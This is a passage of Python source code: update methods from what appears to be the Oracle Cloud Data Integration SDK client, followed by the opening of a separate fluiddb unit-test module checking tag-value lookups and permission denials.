extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"update_folder got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"folderKey": folder_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing),
"if-match": kwargs.get("if_match", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_folder_details,
response_type="Folder")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_folder_details,
response_type="Folder")
def update_pipeline(self, workspace_id, pipeline_key, update_pipeline_details, **kwargs):
"""
Updates a specific pipeline.
:param str workspace_id: (required)
The workspace ID.
:param str pipeline_key: (required)
The pipeline key.
:param oci.data_integration.models.UpdatePipelineDetails update_pipeline_details: (required)
The details needed to update a pipeline.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call for a resource, set the `if-match` parameter to the value of the `etag` from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the `etag` you provide matches the resource's current `etag` value.
When 'if-match' is provided and its value does not exactly match the 'etag' of the resource on the server, the request fails with the 412 response code.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.Pipeline`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/update_pipeline.py.html>`__ to see an example of how to use update_pipeline API.
"""
resource_path = "/workspaces/{workspaceId}/pipelines/{pipelineKey}"
method = "PUT"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"if_match"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"update_pipeline got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"pipelineKey": pipeline_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing),
"if-match": kwargs.get("if_match", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_pipeline_details,
response_type="Pipeline")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_pipeline_details,
response_type="Pipeline")
def update_project(self, workspace_id, project_key, update_project_details, **kwargs):
"""
Updates a specific project.
:param str workspace_id: (required)
The workspace ID.
:param str project_key: (required)
The project key.
:param oci.data_integration.models.UpdateProjectDetails update_project_details: (required)
The details needed to update a project.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call for a resource, set the `if-match` parameter to the value of the `etag` from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the `etag` you provide matches the resource's current `etag` value.
When 'if-match' is provided and its value does not exactly match the 'etag' of the resource on the server, the request fails with the 412 response code.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.Project`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/update_project.py.html>`__ to see an example of how to use update_project API.
"""
resource_path = "/workspaces/{workspaceId}/projects/{projectKey}"
method = "PUT"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"if_match"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"update_project got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"projectKey": project_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing),
"if-match": kwargs.get("if_match", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_project_details,
response_type="Project")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_project_details,
response_type="Project")
def update_reference(self, workspace_id, application_key, reference_key, update_reference_details, **kwargs):
"""
Updates the application references. For example, to map a data asset to a different target object.
:param str workspace_id: (required)
The workspace ID.
:param str application_key: (required)
The application key.
:param str reference_key: (required)
The reference key.
:param oci.data_integration.models.UpdateReferenceDetails update_reference_details: (required)
The details needed to update the references.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call for a resource, set the `if-match` parameter to the value of the `etag` from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the `etag` you provide matches the resource's current `etag` value.
When 'if-match' is provided and its value does not exactly match the 'etag' of the resource on the server, the request fails with the 412 response code.
:param str opc_retry_token: (optional)
A token that uniquely identifies a request so it can be retried in case of a timeout or server error without risk of executing that same action again.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.Reference`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/update_reference.py.html>`__ to see an example of how to use update_reference API.
"""
resource_path = "/workspaces/{workspaceId}/applications/{applicationKey}/references/{referenceKey}"
method = "PUT"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"if_match",
"opc_retry_token"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"update_reference got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"applicationKey": application_key,
"referenceKey": reference_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing),
"if-match": kwargs.get("if_match", missing),
"opc-retry-token": kwargs.get("opc_retry_token", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_reference_details,
response_type="Reference")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_reference_details,
response_type="Reference")
def update_schedule(self, workspace_id, application_key, schedule_key, update_schedule_details, **kwargs):
"""
Updates a schedule under an application.
:param str workspace_id: (required)
The workspace ID.
:param str application_key: (required)
The application key.
:param str schedule_key: (required)
The schedule key.
:param oci.data_integration.models.UpdateScheduleDetails update_schedule_details: (required)
The details needed to update the schedule.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call for a resource, set the `if-match` parameter to the value of the `etag` from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the `etag` you provide matches the resource's current `etag` value.
When 'if-match' is provided and its value does not exactly match the 'etag' of the resource on the server, the request fails with the 412 response code.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.Schedule`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/update_schedule.py.html>`__ to see an example of how to use update_schedule API.
"""
resource_path = "/workspaces/{workspaceId}/applications/{applicationKey}/schedules/{scheduleKey}"
method = "PUT"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"if_match",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"update_schedule got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"applicationKey": application_key,
"scheduleKey": schedule_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_schedule_details,
response_type="Schedule")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_schedule_details,
response_type="Schedule")
def update_task(self, workspace_id, task_key, update_task_details, **kwargs):
"""
Updates a specific task. For example, you can update the task description or move the task to a different folder by changing the `aggregatorKey` to a different folder in the registry.
:param str workspace_id: (required)
The workspace ID.
:param str task_key: (required)
The task key.
:param oci.data_integration.models.UpdateTaskDetails update_task_details: (required)
The details needed to update a task.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call for a resource, set the `if-match` parameter to the value of the `etag` from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the `etag` you provide matches the resource's current `etag` value.
When 'if-match' is provided and its value does not exactly match the 'etag' of the resource on the server, the request fails with the 412 response code.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.Task`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/update_task.py.html>`__ to see an example of how to use the update_task API.
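A minimal usage sketch (hypothetical identifiers; assumes a configured
:py:class:`~oci.data_integration.DataIntegrationClient` named `client`)::

    import oci.retry
    from oci.data_integration.models import UpdateTaskDetails

    # UpdateTaskDetails is a base type; in practice, populate the concrete
    # subtype matching your task type (see the model docs).
    details = UpdateTaskDetails()
    response = client.update_task(
        workspace_id="ocid1.disworkspace.oc1..example",
        task_key="example-task-key",
        update_task_details=details,
        retry_strategy=oci.retry.DEFAULT_RETRY_STRATEGY)
    print(response.data)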
"""
resource_path = "/workspaces/{workspaceId}/tasks/{taskKey}"
method = "PUT"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"if_match"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"update_task got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"taskKey": task_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing),
"if-match": kwargs.get("if_match", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_task_details,
response_type="Task")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_task_details,
response_type="Task")
def update_task_run(self, workspace_id, application_key, task_run_key, update_task_run_details, **kwargs):
"""
Updates the status of the task run. For example, aborts a task run.
:param str workspace_id: (required)
The workspace ID.
:param str application_key: (required)
The application key.
:param str task_run_key: (required)
The task run key.
:param oci.data_integration.models.UpdateTaskRunDetails update_task_run_details: (required)
The details needed to update the status of a task run.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call for a resource, set the `if-match` parameter to the value of the `etag` from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the `etag` you provide matches the resource's current `etag` value.
When 'if-match' is provided and its value does not exactly match the 'etag' of the resource on the server, the request fails with the 412 response code.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.TaskRunDetails`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/update_task_run.py.html>`__ to see an example of how to use the update_task_run API.
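A minimal usage sketch (hypothetical identifiers; assumes a configured
:py:class:`~oci.data_integration.DataIntegrationClient` named `client`)::

    from oci.data_integration.models import UpdateTaskRunDetails

    details = UpdateTaskRunDetails()
    # Set the status field on `details` (see the model docs) to, for
    # example, abort the run.
    response = client.update_task_run(
        workspace_id="ocid1.disworkspace.oc1..example",
        application_key="example-application-key",
        task_run_key="example-task-run-key",
        update_task_run_details=details)
    print(response.data)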
"""
resource_path = "/workspaces/{workspaceId}/applications/{applicationKey}/taskRuns/{taskRunKey}"
method = "PUT"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"if_match"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"update_task_run got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"applicationKey": application_key,
"taskRunKey": task_run_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing),
"if-match": kwargs.get("if_match", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_task_run_details,
response_type="TaskRunDetails")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_task_run_details,
response_type="TaskRunDetails")
def update_task_schedule(self, workspace_id, application_key, task_schedule_key, update_task_schedule_details, **kwargs):
"""
Updates a specific task schedule.
:param str workspace_id: (required)
The workspace ID.
:param str application_key: (required)
The application key.
:param str task_schedule_key: (required)
The task schedule key.
:param oci.data_integration.models.UpdateTaskScheduleDetails update_task_schedule_details: (required)
The details needed to update the task schedule.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call for a resource, set the `if-match` parameter to the value of the `etag` from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the `etag` you provide matches the resource's current `etag` value.
When 'if-match' is provided and its value does not exactly match the 'etag' of the resource on the server, the request fails with the 412 response code.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.TaskSchedule`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/update_task_schedule.py.html>`__ to see an example of how to use the update_task_schedule API.
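A minimal usage sketch (hypothetical identifiers; assumes a configured
:py:class:`~oci.data_integration.DataIntegrationClient` named `client`)::

    from oci.data_integration.models import UpdateTaskScheduleDetails

    details = UpdateTaskScheduleDetails()  # populate the fields to change
    response = client.update_task_schedule(
        workspace_id="ocid1.disworkspace.oc1..example",
        application_key="example-application-key",
        task_schedule_key="example-task-schedule-key",
        update_task_schedule_details=details)
    print(response.data)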
"""
resource_path = "/workspaces/{workspaceId}/applications/{applicationKey}/taskSchedules/{taskScheduleKey}"
method = "PUT"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"if_match",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"update_task_schedule got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"applicationKey": application_key,
"taskScheduleKey": task_schedule_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_task_schedule_details,
response_type="TaskSchedule")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_task_schedule_details,
response_type="TaskSchedule")
def update_workspace(self, workspace_id, update_workspace_details, **kwargs):
"""
Updates the specified Data Integration workspace.
:param str workspace_id: (required)
The workspace ID.
:param oci.data_integration.models.UpdateWorkspaceDetails update_workspace_details: (required)
The information needed to update the workspace.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call for a resource, set the `if-match` parameter to the value of the `etag` from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the `etag` you provide matches the resource's current `etag` value.
When 'if-match' is provided and its value does not exactly match the 'etag' of the resource on the server, the request fails with the 412 response code.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.Workspace`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/update_workspace.py.html>`__ to see an example of how to use the update_workspace API.
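A minimal usage sketch (hypothetical identifiers; assumes a configured
:py:class:`~oci.data_integration.DataIntegrationClient` named `client`)::

    from oci.data_integration.models import UpdateWorkspaceDetails

    details = UpdateWorkspaceDetails()  # e.g. a new display name or description
    response = client.update_workspace(
        workspace_id="ocid1.disworkspace.oc1..example",
        update_workspace_details=details)
    print(response.data)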
"""
resource_path = "/workspaces/{workspaceId}"
method = "PUT"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"if_match",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"update_workspace got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_workspace_details,
response_type="Workspace")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_workspace_details,
response_type="Workspace")
# ---------------------------------------------------------------------------
# fluiddb/api/test/test_value.py (fluidinfo/fluiddb,
# commit b5a8c8349f3eaf3364cc4efba4736c3e33b30d96, Apache-2.0, 80,936 bytes)
# ---------------------------------------------------------------------------
# -*- coding: utf-8 -*-
from json import loads
from uuid import uuid4, UUID
from twisted.internet.defer import inlineCallbacks
from fluiddb.api.facade import Facade
from fluiddb.application import FluidinfoSessionFactory
from fluiddb.common.types_thrift.ttypes import (
TNonexistentTag, TPathPermissionDenied, TNoInstanceOnObject, TBadRequest,
TParseError, TInvalidPath)
from fluiddb.api.value import TagPathAndValue
from fluiddb.data.permission import Operation, Policy
from fluiddb.data.system import createSystemData
from fluiddb.data.tag import getTags
from fluiddb.data.value import createTagValue, getTagValues
from fluiddb.cache.permission import CachingPermissionAPI
from fluiddb.model.tag import TagAPI
from fluiddb.model.user import UserAPI, getUser
from fluiddb.model.value import TagValueAPI, FluidinfoTagValue
from fluiddb.security.tag import SecureTagAPI
from fluiddb.security.value import SecureTagValueAPI
from fluiddb.testing.resources import (
CacheResource, ConfigResource, DatabaseResource, IndexResource,
LoggingResource, ThreadPoolResource)
from fluiddb.testing.basic import FluidinfoTestCase
from fluiddb.testing.session import login
from fluiddb.testing.solr import runDataImportHandler
from fluiddb.util.transact import Transact
from fluiddb.web.query import (
createBinaryThriftValue, createThriftValue, guessValue)
from fluiddb.web.values import ValuesQuerySchema
class FacadeTagValueMixinTest(FluidinfoTestCase):
resources = [('cache', CacheResource()),
('config', ConfigResource()),
('log', LoggingResource()),
('store', DatabaseResource()),
('threadPool', ThreadPoolResource())]
def setUp(self):
super(FacadeTagValueMixinTest, self).setUp()
createSystemData()
self.transact = Transact(self.threadPool)
factory = FluidinfoSessionFactory('API-9000')
self.facade = Facade(self.transact, factory)
UserAPI().create([(u'username', u'password', u'User',
u'user@example.com')])
self.user = getUser(u'username')
self.permissions = CachingPermissionAPI(self.user)
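# The tests below share one calling pattern: open a session with the
# C{login} context manager, call a Facade method (which returns a Twisted
# C{Deferred}), and yield the result inside an C{@inlineCallbacks} test.
# A minimal sketch of that pattern (names as used in this suite):
#
#     with login(u'username', uuid4(), self.transact) as session:
#         value, tagValue = yield self.facade.getTagInstance(
#             session, u'username/tag', str(objectID))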
@inlineCallbacks
def testGetTagInstanceWithUnknownTag(self):
"""
L{FacadeTagValueMixin.getTagInstance} raises a L{TNonexistentTag}
exception if the specified L{Tag.path} doesn't exist.
"""
objectID = uuid4()
self.store.commit()
with login(u'username', objectID, self.transact) as session:
deferred = self.facade.getTagInstance(session, u'unknown/path',
str(objectID))
error = yield self.assertFailure(deferred, TNonexistentTag)
self.assertEqual(u'unknown/path', error.path)
@inlineCallbacks
def testGetTagInstanceWithUnknownObjectID(self):
"""
L{FacadeTagValueMixin.getTagInstance} raises a L{TNoInstanceOnObject}
exception if the specified object ID doesn't exist.
"""
objectID = uuid4()
TagAPI(self.user).create([(u'username/tag', u'description')])
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
deferred = self.facade.getTagInstance(session, u'username/tag',
str(objectID))
error = yield self.assertFailure(deferred, TNoInstanceOnObject)
self.assertEqual(u'username/tag', error.path)
self.assertEqual(str(objectID), error.objectId)
@inlineCallbacks
def testGetTagInstancePermissionDenied(self):
"""
L{FacadeTagValueMixin.getTagInstance} raises a L{TNonexistentTag}
exception if the user doesn't have C{Operation.READ_TAG_VALUE}
permission on the requested L{Tag.path}.
"""
result = TagAPI(self.user).create([(u'username/tag', u'description')])
[(objectID, _)] = result
TagValueAPI(self.user).set({objectID: {u'username/tag': False}})
permissions = CachingPermissionAPI(self.user)
permissions.set([(u'username/tag', Operation.READ_TAG_VALUE,
Policy.OPEN, [u'username'])])
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
deferred = self.facade.getTagInstance(session, u'username/tag',
str(objectID))
error = yield self.assertFailure(deferred, TNonexistentTag)
self.assertEqual(u'username/tag', error.path)
@inlineCallbacks
def testGetTagInstanceReturnsTagValue(self):
"""
L{FacadeTagValueMixin.getTagInstance} returns the L{TagValue}
object in addition to the Thrift value.
